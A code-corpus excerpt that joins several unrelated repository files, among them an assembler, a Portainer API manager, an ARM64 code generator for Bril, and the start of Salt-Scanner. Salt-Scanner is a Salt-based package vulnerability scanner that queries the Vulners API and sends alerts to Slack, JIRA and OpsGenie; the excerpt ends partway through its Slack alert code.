print(f'{operand} : {directions[operand]}')
return directions[operand]
else:
raise Exception(f'Operand not recognized. Received {operand}')
def isAddr(operand):
address = re.search(r'([0-9]+)', operand).group()
if re.match(r'^io\([0-9]+\)',operand):
return '000000' + format(int(address), '02b')
if re.match(r'^int\([0-9]+\)',operand):
return '00001' + format(int(address), '03b')
if re.match(r'^data\([0-9]+\)',operand):
return '1' + format(int(address), '07b')
def opType(operand):
regexps = [r'(?:R(?:1[0-5]|[1-9])|zero)', r'b?[0-9]+', r'(io|data|int)\(([0-9]+)\)', r'[:a-zA-Z0-9]']
functions = [isRegister, isImm, isAddr, isOther] # This is a function list
index = -1
for regex in regexps:
index += 1
if re.match(regex, operand):
# Now a function is applied to the item to turn it into binary code
return functions[index](operand)
raise Exception(f'Operand {operand} is not valid')
def operateFile(file, func):
result = func(file)
file.seek(0)
return result
def translate(file):
#Transform assembly instructions into machine code.
result = []
for line in file:
operation = ''
opcode = ''
line = line.strip('\n')
items = line.split(' ')
items = list(filter(None, items))
if items[0] in opcodeDict:
operation = rules[items[0]]
opcode = opcodeDict[items[0]]
operation = re.sub(r'O+', opcode, operation)
items.remove(items[0])
s = 'X'
for item in items:
operand = opType(item)
occurences = len(re.search(s+'+', operation).group())
if occurences < len(operand):
operand = operand[len(operand) - occurences:]
operation = re.sub(s+'+', operand, operation)
s = chr((ord(s) + 1))
result.append(str(operation))
elif items[0][0] == ':':
continue
else:
raise Exception(f'ERROR: {line.split()[0]} in not a valid opcode')
return result
def resolveDirections(file):
instructionDir = 0
for line in file:
match = re.search(r'^:([a-zA-Z0-9_-]+)', line)
if match:
directions[match.group(1)] = format(instructionDir, '010b')
else:
instructionDir += 1
def strip_input(out_file, csvFile):
#with open(path, 'r') as csvFile:
lines = csvFile.read().splitlines()
code_section = preprocess(lines)
for line in lines[code_section:]:
line = line.strip()
if line:
if re.match(r'^#', line): #If line is a comment ignore it
continue
elif re.search(r'#', line): #Strip comment ater instruction
index = re.search(r'#', line).start()
out_file.write(line[0:index]+'\n')
else: #Add instruction to virtual file
out_file.write(line+'\n')
#Make file ready to be read again
out_file.seek(0)
def read_mem_file( input_file ):
#assembly_code will contain the lines of assembly code to translate
with open(input_file, 'r') as infile:
return_code = []
assembly_code = csv.DictReader(infile, delimiter = ' ',
fieldnames = ["opcode", "op1", "op2"],
restval = None,
quoting = csv.QUOTE_NONE)
for instruction in assembly_code:
opc, op1, op2 = instruction["opcode"], instruction["op1"], instruction["op2"]
return_code.append({"opcode":opc, "op1":op1, "op2":op2})
return return_code
def preprocess( lines ):
begining = 0
for line in lines:
if line != '.code':
match = re.search(r'^use ([a-zA-Z0-9]+) as ([a-zA-Z0-9\(\)]+$)',line)
if match is not None:
prep_rules[match.group(1)] = match.group(2)
begining += 1
else:
return begining + 1
return None
``` |
{
"source": "0x464c4f/portainer_stack_management",
"score": 3
} |
#### File: portainer_stack_management/portainer_management/portainer_management.py
```python
import portainer_api
from portainer_api.api.auth_api import AuthApi
from portainer_api.models.stack_list_response import StackListResponse
import yaml
import base64
import json
import sys
import os
from portainer_api.rest import ApiException
class Portainer_Management:
def __init__(self, username:str, password:str) -> None:
self.configuration = portainer_api.Configuration()
self.configuration.host = os.environ("PORTAINER_URL")
self.configuration.verify_ssl = True
self.username = username
self.password = password
self.client = portainer_api.ApiClient(self.configuration)
authapi = portainer_api.AuthApi(self.client)
self.access_token = self.authenticate(authapi, username, password)
def authenticate(self, authapi:AuthApi, username, password):
try:
auth_body = portainer_api.AuthenticateUserRequest(username=self.username,password=self.password)
api_response = authapi.authenticate_user(auth_body)
access_token = api_response.jwt
self.client.set_default_header(header_name="Authorization", header_value=access_token)
print("Successfully authenticated")
except ApiException as e:
access_token = ""
print("Exception when calling api: %s\n" % e)
return access_token
def does_secret_already_exist(self,secret_name,header):
secret_exists = False
try:
response = self.client.request(method="GET",url=self.configuration.host+"/endpoints/1/docker/secrets",headers=header)
data = json.loads(response.data)
for secret in data:
if secret["Spec"]["Name"]==secret_name:
secret_exists = secret["ID"]
except ApiException as e:
print(f"Something wrong in the stack already exists call:{e}")
return secret_exists
def does_stack_already_exist(self,stack_name):
try:
stack_api_client = portainer_api.StacksApi(self.client)
all_stacks:StackListResponse = stack_api_client.stack_list()
stack_exists = False
for stack in all_stacks:
if stack_name==stack["Name"]:
stack_exists = stack["Id"]
return stack_exists
except ApiException as e:
print(f"Something wrong in the stack already exists call:{e}")
def create_or_update_stack_from_compose_file(self, compose_filename, stack_name, swarm_id=os.environ("SWARM_ID"),endpoint_id=1):
### include path to compose file if not in the same folder
try:
stack_api_client = portainer_api.StacksApi(self.client)
stack_api_client.stack_list()
with open(compose_filename) as file:
file_loaded = yaml.load(file, Loader=yaml.FullLoader)
yaml_string = yaml.dump(file_loaded,indent=2, width=10)
stack_id =self.does_stack_already_exist(stack_name=stack_name)
if stack_id:
body_stack_update = portainer_api.StackUpdateRequest(stack_file_content=yaml_string)
response = stack_api_client.stack_update(id=stack_id,body=body_stack_update,endpoint_id=endpoint_id)
print(f"Stack {stack_name} updated successfully")
print(response)
else:
body_test_stack=portainer_api.StackCreateRequest(name=stack_name,swarm_id=swarm_id,stack_file_content=yaml_string)
response = stack_api_client.stack_create(type=1,method="string",endpoint_id=endpoint_id,body=body_test_stack)
print(f"Stack {stack_name} created successfully")
print(response)
except ApiException as e:
print("Exception when calling api: %s\n" % e)
def remove_docker_secret():
return 0
def create_or_update_docker_secret(self,secret_name:str,secret_value:str,labels={}):
secret_value_encoded = base64.b64encode(secret_value.encode("ascii")).decode("ascii")
body = {"Name":secret_name,"Data":secret_value_encoded,"Labels":labels}
header = {"Authorization": self.access_token}
secret_id = self.does_secret_already_exist(secret_name,header)
# Remove secret if it already exists - this is necessary to update it
if secret_id:
print(f"Secret {secret_name} exists already - is getting updated")
try:
response = self.client.request(method="DELETE",url=self.configuration.host+"/endpoints/1/docker/secrets/"+str(secret_id),headers=header)
if response.status == 204:
print(f"Secret {secret_name} successfully deleted")
except ApiException as e:
print("Exception when calling api: %s\n" % e)
# Create secret
try:
response = self.client.request(method="POST",url=self.configuration.host+"/endpoints/1/docker/secrets/create",body=body,headers=header)
if response.status == 200:
print(f"Secret {secret_name} successfully created")
except ApiException as e:
print("Exception when calling api: %s\n" % e)
# if __name__ == "__main__":
# If called as module it will create / update the specified stack
# Create or update secret:
# api.create_or_update_docker_secret("super_secret","leeet")
# Create or update stack example:
# api.create_or_update_stack_from_compose(compose_filename=compose_filename,stack_name=stack_name)
``` |
{
"source": "0x4849/cmput366",
"score": 3
} |
#### File: cmput366/Assignment3MountainCar/plot.py
```python
import sys
from numpy import *
from pylab import *
from mpl_toolkits.mplot3d import Axes3D
def main():
x1steps = x2steps = 50.0
x1range = linspace(-1.2, 0.5, x1steps)
x2range = linspace(-0.07, 0.07, x2steps)
y = loadtxt(sys.argv[1])
fig = figure()
ax = Axes3D(fig)
x1,x2 = meshgrid(x1range,x2range)
ax.plot_surface(x1, x2, y.T, cstride=1, rstride=1, cmap=cm.jet)
ax.set_xlabel('position')
ax.set_ylabel('velocity')
ax.set_zlabel('$max_a Q(s,a)$')
savefig("plot.pdf", bbox_inches='tight')
if __name__ == '__main__':
main()
show()
``` |
{
"source": "0x486F626F/bril",
"score": 2
} |
#### File: bril/bril2arm64/codegen.py
```python
def func_header(funcname):
print('\t.global %s' % funcname)
print('\t.type %s, %%function' % funcname)
print('%s:' % funcname)
def push_stack(reg):
print('\tstr %s, [sp, -0x10]!' % reg)
def pop_stack(reg):
print('\tldr %s, [sp], 0x10' % reg)
def store_stack(value, offset):
print('\tmov x8, %d' % value)
print('\tstr x8, [fp, %s]' % str(hex(offset)))
def binary_oprand(oprand, offdst, offsrc1, offsrc2):
print('\tldr x8, [fp, %s]' % str(hex(offsrc1)))
print('\tldr x9, [fp, %s]' % str(hex(offsrc2)))
print('\t%s x8, x8, x9' % oprand)
print('\tstr x8, [fp, %s]' % str(hex(offdst)))
def copy_stack(offdst, offsrc):
print('\tldr x8, [fp, %s]' % str(hex(offsrc)))
print('\tstr x8, [fp, %s]' % str(hex(offdst)))
def comparison(oprand, offdst, offsrc1, offsrc2):
print('\tldr x8, [fp, %s]' % str(hex(offsrc1)))
print('\tldr x9, [fp, %s]' % str(hex(offsrc2)))
print('\tcmp x8, x9')
print('\tcset x8, %s' % oprand)
print('\tstr x8, [fp, %s]' % str(hex(offdst)))
def unary_oprand(oprand, offdst, offsrc):
print('\tldr x8, [fp, %s]' % str(hex(offsrc)))
print('\t%s x8, x8' % oprand)
print('\tstr x8, [fp, %s]' % str(hex(offdst)))
def jmp(label):
print('\tb %s' % label)
def ret(funcname):
print('\tb %s_ret' % funcname)
def br(offset, label1, label2):
print('\tldr x8, [fp, %s]' % str(hex(offset)))
print('\tcbnz x8, %s' % label1)
print('\tb %s' % label2)
def printint(offset):
print('\tadr x0, fmtld')
print('\tldr x1, [fp, %s]' % str(hex(offset)))
print('\tbl printf')
def printbool(offset):
print('\tldr x1, [fp, %s]' % str(hex(offset)))
print('\tbl printbool')
def printstr(label):
print('\tadr x0, %s' % label)
print('\tbl printf')
def printfooter():
print('''
.global printbool
printbool:
cbz x1, printboolfalse
adr x0, strtrue
b printboolendif
printboolfalse:
adr x0, strfalse
printboolendif:
bl printf
ret lr
.data
fmtld: .string "%ld"
strtrue: .string "true"
strfalse: .string "false"
strspace: .string " "
strnewline: .string "\\n"''')
``` |
{
"source": "0x48piraj/DomRadar",
"score": 3
} |
#### File: DomRadar/utils/avail.py
```python
import sys
import whois
def is_available(domain):
try:
w = whois.whois(domain)
return False
except Exception as e:
if e == "KeyboardInterrupt":
sys.exit()
return domain
```
#### File: DomRadar/utils/ds.py
```python
import os, glob
import os.path as path
import pathlib
ROOT_DIR = pathlib.Path(__file__).parents[1].joinpath('datasets')
def load_all():
datasets = ROOT_DIR.rglob('*.txt')
_all = []
for dataset in datasets:
words = open(dataset, 'r').read().splitlines()
for word in words:
_all.append(word)
return _all
def load_dataset(directory):
datasets = ROOT_DIR.joinpath(directory).rglob('*.txt')
_all = []
for dataset in datasets:
words = open(dataset, 'r').read().splitlines()
for word in words:
_all.append(word)
return _all
``` |
{
"source": "0x49D1/dfuse_python_rest_api",
"score": 3
} |
#### File: dfuse_python_rest_api/dfuse_api/issue_token.py
```python
import requests
import redis
import json
import time
redis_db = redis.StrictRedis(host="localhost", port=6379, db=0)
def get_token(api_key):
global redis_db
token = redis_db.get(f'get_token{api_key}')
if token is None or token == '':
print("Getting token from auth.dfuse.io")
response = requests.post(
"https://auth.dfuse.io/v1/auth/issue", json={"api_key": f"{api_key}"})
token = response.text
redis_db.set(f'get_token{api_key}', token, ex=(json.loads(token)["expires_at"] - int(time.time()) - 60*60)) # get the real expiration and "minus one more hour"
return json.loads(token)
# if __name__ == "__main__":
# token = get_token("server_test_key_here")
# print(token)
``` |
{
"source": "0x4aK/TSBot",
"score": 2
} |
#### File: TSBot/examples/command_checks.py
```python
from __future__ import annotations
import asyncio
from tsbot import TSBot, commands
from tsbot.exceptions import TSPermissionError
bot = TSBot(
username="USERNAME",
password="PASSWORD",
address="ADDRESS",
)
def allow_only_uids(*uid: str):
"""Checks for UIDs. If uid not in given list, raise TSPermissionError"""
async def check_uid(bot: TSBot, ctx: dict[str, str], *args: str, **kwargs: str) -> None:
if ctx.get("invokeruid") not in uid:
raise TSPermissionError("User not allowed to run this command")
return check_uid
@commands.add_check(allow_only_uids("v8t+Jw6+qNDl1KHuDfS7zVjKSws="))
@bot.command("eval")
async def eval_(bot: TSBot, ctx: dict[str, str]) -> None:
try:
response = eval(ctx["invoker_removed"])
except Exception as e:
response = f"{e.__class__.__name__}: {e}"
await bot.respond(ctx, response)
asyncio.run(bot.run())
```
#### File: TSBot/examples/simple_example.py
```python
from __future__ import annotations
import asyncio
from tsbot import TSBot, events
from tsbot.query import query
bot = TSBot(
username="USERNAME",
password="PASSWORD",
address="ADDRESS",
)
@bot.command("hello")
async def hello_world(bot: TSBot, ctx: dict[str, str]):
await bot.respond(ctx, "Hello World!")
@bot.on("cliententerview")
async def poke_on_enter(bot: TSBot, event: events.TSEvent):
poke_query = query("clientpoke").params(clid=event.ctx["clid"], msg="Welcome to the server!")
await bot.send(poke_query)
asyncio.run(bot.run())
```
#### File: tsbot/extensions/bot_info.py
```python
from __future__ import annotations
import logging
from typing import TYPE_CHECKING
from tsbot.extensions import extension
if TYPE_CHECKING:
from tsbot.bot import TSBot
logger = logging.getLogger(__name__)
class BotInfo(extension.Extension):
def __init__(self, parent: TSBot) -> None:
super().__init__(parent)
self.clid: str
self.database_id: str
self.login_name: str
self.nickname: str
self.unique_identifier: str
def __repr__(self) -> str:
return f"{self.__class__.__qualname__}(clid={self.clid}, nickname={self.nickname}, database_id={self.database_id}, unique_identifier={self.unique_identifier})"
async def run(self):
await self.update()
async def update(self):
response = await self.parent.send_raw("whoami")
self.clid = response.first["client_id"]
self.database_id = response.first["client_database_id"]
self.login_name = response.first["client_login_name"]
self.nickname = response.first["client_nickname"]
self.unique_identifier = response.first["client_unique_identifier"]
```
#### File: tsbot/extensions/events.py
```python
from __future__ import annotations
import asyncio
import logging
from collections import defaultdict
from typing import TYPE_CHECKING, Any, Callable, Coroutine, TypeAlias
from tsbot import utils
from tsbot.extensions import extension
if TYPE_CHECKING:
from tsbot.bot import TSBot
from tsbot.plugin import TSPlugin
logger = logging.getLogger(__name__)
class TSEvent:
__slots__ = "event", "msg", "ctx"
def __init__(self, event: str, msg: str | None = None, ctx: dict[str, str] | None = None) -> None:
self.event = event
self.msg = msg
self.ctx: dict[str, str] = ctx or {}
def __repr__(self) -> str:
return f"{self.__class__.__qualname__}(event={self.event!r}, msg={self.msg!r}, ctx={self.ctx!r})"
@classmethod
def from_server_response(cls, raw_data: str):
event, data = raw_data.split(" ", maxsplit=1)
return cls(event=event.removeprefix("notify"), msg=None, ctx=utils.parse_line(data))
T_EventHandler: TypeAlias = Callable[..., Coroutine[TSEvent, None, None]]
class TSEventHandler:
__slots__ = "event", "handler", "plugin_instance"
def __init__(self, event: str, handler: T_EventHandler, plugin_instance: TSPlugin | None = None) -> None:
self.event = event
self.handler = handler
self.plugin_instance = plugin_instance
def __repr__(self) -> str:
return (
f"{self.__class__.__qualname__}(event={self.event!r}, "
f"handler={self.handler.__qualname__!r}, "
f"plugin={None if not self.plugin_instance else self.plugin_instance.__class__.__qualname__!r}"
")"
)
async def run(self, bot: TSBot, event: TSEvent) -> None:
event_args = (bot, event)
if self.plugin_instance:
event_args = (self.plugin_instance, *event_args)
await self.handler(*event_args)
def __call__(self, *args: Any, **kwargs: Any):
return self.run(*args, **kwargs)
class EventHanlder(extension.Extension):
def __init__(self, parent: TSBot) -> None:
super().__init__(parent)
self.event_handlers: defaultdict[str, list[TSEventHandler]] = defaultdict(list)
self.event_queue: asyncio.Queue[TSEvent] = asyncio.Queue()
def _handle_event(self, event: TSEvent, timeout: float | None = None):
event_handlers = self.event_handlers.get(event.event, [])
for event_handler in event_handlers:
asyncio.create_task(asyncio.wait_for(event_handler.run(self.parent, event), timeout=timeout))
async def _handle_events_task(self) -> None:
"""
Task to run events put into the self._event_queue
if task is cancelled, it will try to run all the events
still in the queue with a timeout
"""
try:
while True:
event = await self.event_queue.get()
logger.debug("Got event: %s", event)
self._handle_event(event)
self.event_queue.task_done()
except asyncio.CancelledError:
while not self.event_queue.empty():
event = await self.event_queue.get()
self._handle_event(event, timeout=1.0)
self.event_queue.task_done()
def register_event_handler(self, event_handler: TSEventHandler) -> None:
"""Registers event handlers that will be called when given event happens"""
self.event_handlers[event_handler.event].append(event_handler)
logger.debug(f"Registered {event_handler.event!r} event to execute {event_handler.handler.__qualname__!r}")
async def run(self):
self.parent.register_background_task(self._handle_events_task, name="HandleEvent-Task")
```
#### File: tsbot/extensions/extension.py
```python
from __future__ import annotations
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from tsbot.bot import TSBot
class Extension:
def __init__(self, parent: TSBot) -> None:
self.parent = parent
async def run(self):
...
``` |
{
"source": "0x4C4A/SS-2014",
"score": 2
} |
#### File: SS-2014/LD3/ld3_script.py
```python
import sys
import numpy as np
import matplotlib.pyplot as plt
from PyQt4 import QtGui, QtCore
from scipy.fftpack import fft
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QTAgg as NavigationToolbar
class Window(QtGui.QDialog):
def __init__(self, parent=None):
super(Window, self).__init__(parent)
# a figure instance to plot on
self.figure = plt.figure()
self.setWindowTitle('Singnala spektra atkariba no taisnstura loga platuma')
# this is the Canvas Widget that displays the `figure`
# it takes the `figure` instance as a parameter to __init__
self.canvas = FigureCanvas(self.figure)
# this is the Navigation widget
# it takes the Canvas widget and a parent
self.toolbar = NavigationToolbar(self.canvas, self)
# Make a slidebar
sld = QtGui.QSlider(QtCore.Qt.Horizontal, self)
sld.setFocusPolicy(QtCore.Qt.StrongFocus)
sld.setGeometry(30, 40, 200, 30)
sld.setMaximum(40)
sld.setMinimum(1)
sld.setTickInterval(1)
sld.setTickPosition(2)
sld.setValue(20)
sld.valueChanged[int].connect(self.changeValue)
# Make a Line Edit widget
self.qle = QtGui.QLineEdit(self)
self.qle.setReadOnly(1)
#self.qle.insert('Taisnstura loga platums:')
# set the layout
layout = QtGui.QVBoxLayout()
layout.addWidget(self.toolbar)
layout.addWidget(self.canvas)
layout.addWidget(sld)
layout.addWidget(self.qle)
self.setLayout(layout)
def changeValue(self, value):
''' plot '''
# Laika parametri
T = value/10.
sampRate = samples/T
x = np.linspace(0, T, samples)
# Logots signāls
y = np.sin(2*np.pi*x)+np.sin(2*np.pi*x*1.5)
# Diskrēts spektrs
S = fft(y)/samples
fs = np.arange(0, sampRate, 1/T)
# Vienlaidu spektrs
fx0 = np.arange(-2, 10, 0.001)
S0 = 0.5*np.sinc(T*fx0)
# plot
sign = self.figure.add_subplot(211)
spectr = self.figure.add_subplot(212)
# Atceļ veco
sign.hold(False)
spectr.hold(False)
# Uzliek jauno
sign.plot(x, y, '.-k')
sign.legend(['Ierobezots signals'], 1)
spectr.stem(fs, abs(S), linefmt='k', markerfmt='.k'), spectr.hold(True)
spectr.plot(fx0+1, abs(S0), '-.b')
spectr.legend(['Signala spektrs'], 1)
spectr.axis([0., 5., 0, 0.8])#, sign.axis([0, 4., -1, 1])
spectr.grid(b = True, which='both', linewidth=2), sign.grid(b = True)
# Papildina Line Edit widget ar loga platumu
t = 'Taisnstura loga platums: {}xT'.format(T)
self.qle.setSelection(0, len(t))
self.qle.insert(t)
# Atjauno canvas
self.canvas.draw()
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
# Siulācijas laika patametri
samples = 128
# GUI
main = Window()
main.changeValue(20)
main.show()
sys.exit(app.exec_())
``` |
{
"source": "0x4D31/salt-scanner",
"score": 2
} |
#### File: 0x4D31/salt-scanner/salt-scanner.py
```python
from collections import defaultdict
from slackclient import SlackClient
from opsgenie.swagger_client import AlertApi
from opsgenie.swagger_client import configuration
from opsgenie.swagger_client.rest import ApiException
from opsgenie.swagger_client.models import *
from jira import JIRA
import json
import os
import time
import salt.client
import uuid
import sys
import re
import argparse
import tempfile
try:
import urllib.request as urllib2
except ImportError:
import urllib2
__author__ = 'Adel "<PASSWORD>" Ka'
__version__ = '0.1'
#############################[ configuration ]#############################
# OS name in lowercase (e.g. "centos")
# OS version (e.g. "7")
# Set the both values to None for automatic OS and version detection
default_os_name = None
default_os_ver = None
# Bash glob (e.g. "prod-db*") or python list of hosts (e.g. "host1,host2")
target_hosts = "*"
# Slack Alert
slack_alert = False
# Set your Slack API Token here.
# Alternatively, you can use the environment variable SLACK_API_TOKEN
slack_api_token = "<PASSWORD>"
# Use "#something" for public channels or "something" for private channels
slack_channel = "#vulners"
# Minimum CVSS score for creating a JIRA issue or OpsGenie alert
alert_score = 7
# JIRA Alert
# creates an issue per scan (not per vulnerable host)
jira_alert = False
jira_server = "https://yourcompany.atlassian.net"
jira_user = "user"
jira_pass = "<PASSWORD>"
issue_type = "Task"
issue_projectKey = "VM"
issue_summary = "New issue from Salt-Scanner"
issue_priority = "Critical"
# OpsGenie Alert
# creates an alert per scan (not per vulnerable host)
opsgenie_alert = False
opsgenie_api_key = "d94de12d-4ds1-4d40-b211-EXAMPLE"
opsgenie_taglist = ['security', 'devops', 'vuln']
opsgenie_entity = "Prod-servers"
opsgenie_message = "New alert from Salt-Scanner"
# Priority of the alert. Should be one of P1, P2, P3 (default), P4, or P5:
# P1-Critical, P2-High, P3-Moderate, P4-Low, P5-Informational
opsgenie_priority = "P1"
###########################################################################
VULNERS_LINKS = {'pkgChecker': 'https://vulners.com/api/v3/audit/audit/',
'bulletin': 'https://vulners.com/api/v3/search/id/?id=%s'}
ASCII = r"""
==========================================================
Vulnerability scanner based on Vulners API and Salt Open
_____ _ _ _____
/ ___| | | | / ___|
\ `--. __ _| | |_ \ `--. ___ __ _ _ __ _ __ ___ _ __
`--. \/ _` | | __| `--. \/ __/ _` | '_ \| '_ \ / _ \ '__|
/\__/ / (_| | | |_ /\__/ / (_| (_| | | | | | | | __/ |
\____/ \__,_|_|\__| \____/ \___\__,_|_| |_|_| |_|\___|_|
Salt-Scanner 0.1 / by 0x4D31
==========================================================
"""
hcount = vhcount = id = 0
def get_os(hosts, form):
client = salt.client.LocalClient()
result = client.cmd(
hosts, 'cmd.run',
['cat /etc/os-release'],
expr_form=form
)
if result:
hostsDict = defaultdict(dict)
osDict = defaultdict(list)
for key, value in result.iteritems():
for line in value.split('\n'):
if "=" in line:
k, v = line.rstrip().split("=")
if k == "ID":
hostsDict[key][k] = v.strip('"')
if k == "VERSION_ID":
hostsDict[key][k] = v.strip('"')
if hostsDict[key]["ID"] == "amzn":
hostsDict[key]["ID"] = "amazon linux"
for host, info in hostsDict.iteritems():
keyname = "%s-%s" % (info["ID"], info["VERSION_ID"])
osDict[keyname].append(host)
return osDict
def get_packages(osName, hosts, form):
client = salt.client.LocalClient()
if osName in ('debian', 'ubuntu', 'kali'):
cmd = "dpkg-query -W -f='${Package} ${Version} ${Architecture}\n'"
elif osName in ('rhel', 'centos', 'oraclelinux', 'suse',
'fedora', 'amazon linux', 'amazon'):
cmd = "rpm -qa"
else:
cmd = None
return client.cmd(
hosts,
'cmd.run',
[cmd],
expr_form=form
) if cmd else None
def get_kernel(host, osName):
client = salt.client.LocalClient()
res = client.cmd(
host,
'cmd.run',
["uname -r"]
)
if osName in ('rhel', 'centos', 'oraclelinux', 'suse',
'fedora', 'amazon linux', 'amazon'):
return "kernel-{}".format(res[host])
elif osName in ('debian', 'ubuntu', 'kali'):
return "linux-image-{}".format(res[host])
def sendVulnRequest(url, payload):
req = urllib2.Request(url)
req.add_header('Content-Type', 'application/json')
req.add_header('User-Agent', 'salt-scanner')
response = urllib2.urlopen(req, json.dumps(payload).encode('utf-8'))
responseData = response.read()
if isinstance(responseData, bytes):
responseData = responseData.decode('utf8')
responseData = json.loads(responseData)
return responseData
def audit(packagesDict, osName, osVer, tgt_hosts):
global hcount, vhcount
# vhosts contains the list of vulnerable hosts by severity
# {'SEVERITY': [list of hosts]}
vhosts = defaultdict(list)
# vdict contains the list of vulnerable hosts, overall CVSS score & vector,
# and vulnerable packages. Will use this for creating JIRA issues and etc.
# {'HOST': {'cvss_score':'SCORE', 'cvss_vector':'VECTOR',
# 'vuln_pkgs': 'list of vulnerable packages'}}
vdict = defaultdict(dict)
now = time.strftime('%a, %d %b %Y %H:%M:%S %Z', time.localtime())
starttext = ("{:=^36}\nScan started at {}\n{:=^36}\n:ghost: Scan Results:"
).format("", now, "")
if slack_alert:
slack_alerter(None, starttext)
filename = ("{}_{}.txt").format(
time.strftime("%Y%m%d-%H%M%S", time.localtime()), str(uuid.uuid4())
)
file = os.path.join(tempfile.gettempdir(), filename)
with open(file, 'w') as f:
f.write("{}\n".format(starttext))
for key, value in packagesDict.iteritems():
hcount += 1
init_pkgs = value.splitlines()
# remove kernel packages from the list
r = re.compile('kernel-[0-9]')
r2 = re.compile('linux-image-[0-9]')
pkgs = filter(lambda i: not (r.match(i) or r2.match(i)), init_pkgs)
# OR pkgs = [i for i in init_pkgs if not r.match(i)]
# add kernel package to the list, based on uname:
kernelpkg = get_kernel(key, osName)
if kernelpkg:
pkgs.append(kernelpkg)
print("+ Started Scanning '{}'...".format(key))
print(" - Total Packages: {}".format(len(pkgs)))
payload = {'os': osName,
'version': osVer,
'package': pkgs}
url = VULNERS_LINKS.get('pkgChecker')
response = sendVulnRequest(url, payload)
resultCode = response.get("result")
if resultCode == "OK":
# if response.get('data').get('cvss').get('score') != 0:
vulnsFound = response.get('data').get('vulnerabilities')
if not vulnsFound:
print(" - No vulnerabilities found.")
with open(file, 'a') as f:
f.write("\n\n+ Host: {}\n No vulnerabilities found.\n"
.format(key))
if slack_alert:
slack_alerter(key, "ok")
else:
vhcount += 1
if slack_alert:
slack_alerter(key, response)
cvss_vector = response.get('data').get('cvss').get('vector')
cvss_score = response.get('data').get('cvss').get('score')
vuln_pkgs = ",".join(response.get('data').get('packages'))
if ((jira_alert or opsgenie_alert) and
cvss_score >= alert_score):
vdict[key]['cvss_score'] = cvss_score
vdict[key]['cvss_vector'] = cvss_vector
vdict[key]['vuln_pkgs'] = vuln_pkgs
if cvss_score >= 7:
severity = "Critical" if cvss_score >= 9 else "High"
elif 4 <= cvss_score < 7:
severity = "Medium"
else:
severity = "Low"
vpcount = 0
for vp in response.get('data').get('packages'):
vpcount += 1
print(" - {} Vulnerable Packages Found - Severity: {}"
.format(vpcount, severity))
vhosts[severity].append(key)
with open(file, 'a') as f:
f.write("\n\n+ Host: {}\n CVSS Score: {} Severity: {}\n\n Vulnerable packages:\n"
.format(key, cvss_score, severity))
payload = {'id': vulnsFound}
allVulnsInfo = sendVulnRequest(
VULNERS_LINKS['bulletin'], payload)
vulnInfoFound = allVulnsInfo['result'] == 'OK'
for package in response['data']['packages']:
with open(file, 'a') as f:
f.write(" {}\n".format(package))
packageVulns = []
for vulns in response['data']['packages'][package]:
if vulnInfoFound:
vulnInfo = ("{id} - '{title}', CVSS Score: {score}"
.format(id=vulns,
title=allVulnsInfo['data']['documents'][vulns]['title'],
score=allVulnsInfo['data']['documents'][vulns]['cvss']['score']))
packageVulns.append(
vulnInfo,
allVulnsInfo['data']['documents'][vulns]['cvss']['score'])
else:
packageVulns.append((vulns, 0))
packageVulns = [" "*10 + x[0] for x in packageVulns]
with open(file, 'a') as f:
f.write("\n".join(packageVulns) + "\n")
else:
print("Error - %s" % response.get('data').get('error'))
correct_words = "Hosts are" if vhcount >= 1 else "Host is"
endtext = ("Finished scanning {} hosts (target hosts: '{}').\n{} {} vulnerable!"
.format(hcount, tgt_hosts, vhcount, correct_words))
print("\n+ {}\n".format(endtext))
with open(file, 'a') as f:
f.write("\n\n{}".format(endtext))
print("+ Output file created: {}".format(file))
if slack_alert:
slack_alerter(None, endtext)
if vhosts:
slack_alerter(None, vhosts)
slack_fileUpload(filename, file)
if jira_alert and vdict:
jira_alerter(vdict)
if opsgenie_alert and vdict:
opsgenie_alerter(vdict)
def slack_tokenCheck():
try:
slack_api_token
except NameError:
if "SLACK_API_TOKEN" in os.environ:
return
else:
print("Error: Missing Slack API Token")
sys.exit(1)
def slack_fileUpload(filename, file):
global slack_api_token
try:
slack_api_token
except NameError:
slack_api_token = os.environ["SLACK_API_TOKEN"]
sc = SlackClient(slack_api_token)
response = sc.api_call(
'files.upload',
channels=slack_channel,
filename=filename,
file=open(file, 'rb'),
title="Full scan results")
if not response['ok']:
print("Slack Error: {}".format(response['error']))
else:
print("+ Full report uploaded to Slack")
def slack_alerter(host, rd):
global id, slack_api_token
try:
slack_api_token
except NameError:
slack_api_token = os.environ["SLACK_API_TOKEN"]
sc = SlackClient(slack_api_token)
if host is not None:
if rd == "ok":
response = sc.api_call(
"chat.postMessage",
channel=slack_channel,
text=("Host _%s_ is not vulnerable." % host),
thread_ts=id
)
if not response['ok']:
print("Slack Error: {}".format(response['error']))
else:
vpcount = 0
for vp in rd.get('data').get('packages'):
vpcount += 1
vulnpacks = "\n".join(rd.get('data').get('packages'))
cvss = rd.get('data').get('cvss').get('score')
if cvss >= 7:
color = "danger"
severity = "Critical" if cvss >= 9 else "High"
elif 4 <= cvss < 7:
color = "warning"
severity = "Medium"
else:
color = "good"
severity = "Low"
att = [{
"fallback": "scan results",
"color": color,
"pretext": ("%d vulnerable packages detected!" % vpcount),
"title": "Hostname: ",
"text": host,
"fields": [
{
"title": "CVSS Score",
"value": cvss,
"short": "true"
},
{
"title": "Severity",
"value": severity,
"short": "true"
},
{
"title": "Vulnerable Packages",
"value": vulnpacks
}
],
"footer": "Vulners",
"footer_icon": "https://pbs.twimg.com/profile_images/711948370332545025/0A-995CX.jpg",
"ts": id
}]
response = sc.api_call(
"chat.postMessage",
channel=slack_channel,
text=("Host _%s_ is vulnerable :scream:" % host),
attachments=json.dumps(att),
thread_ts=id
)
if not response['ok']:
print("Slack Error: {}".format(response['error']))
else:
if type(rd) is str:
response = sc.api_call(
"chat.postMessage",
channel=slack_channel,
text=(rd)
)
if not response['ok']:
print("Slack Error: {}".format(response['error']))
sys.exit(1)
else:
id = response['ts']
else:
for sev, hosts in rd.iteritems():
vulnhosts = "\n".join(hosts)
if sev in ("Critical", "High"):
color = "danger"
elif sev == "Medium":
color = "warning"
else:
color = "good"
att = [{
"fallback": "scan results - summary",
"color": color,
"title": "Severity",
"text": sev,
"fields": [
{
"title": "Hosts",
"value": vulnhosts
}
],
"footer": "Vulners",
"footer_icon": "https://pbs.twimg.com/profile_images/711948370332545025/0A-995CX.jpg",
"ts": id
}]
response = sc.api_call(
"chat.postMessage",
channel=slack_channel,
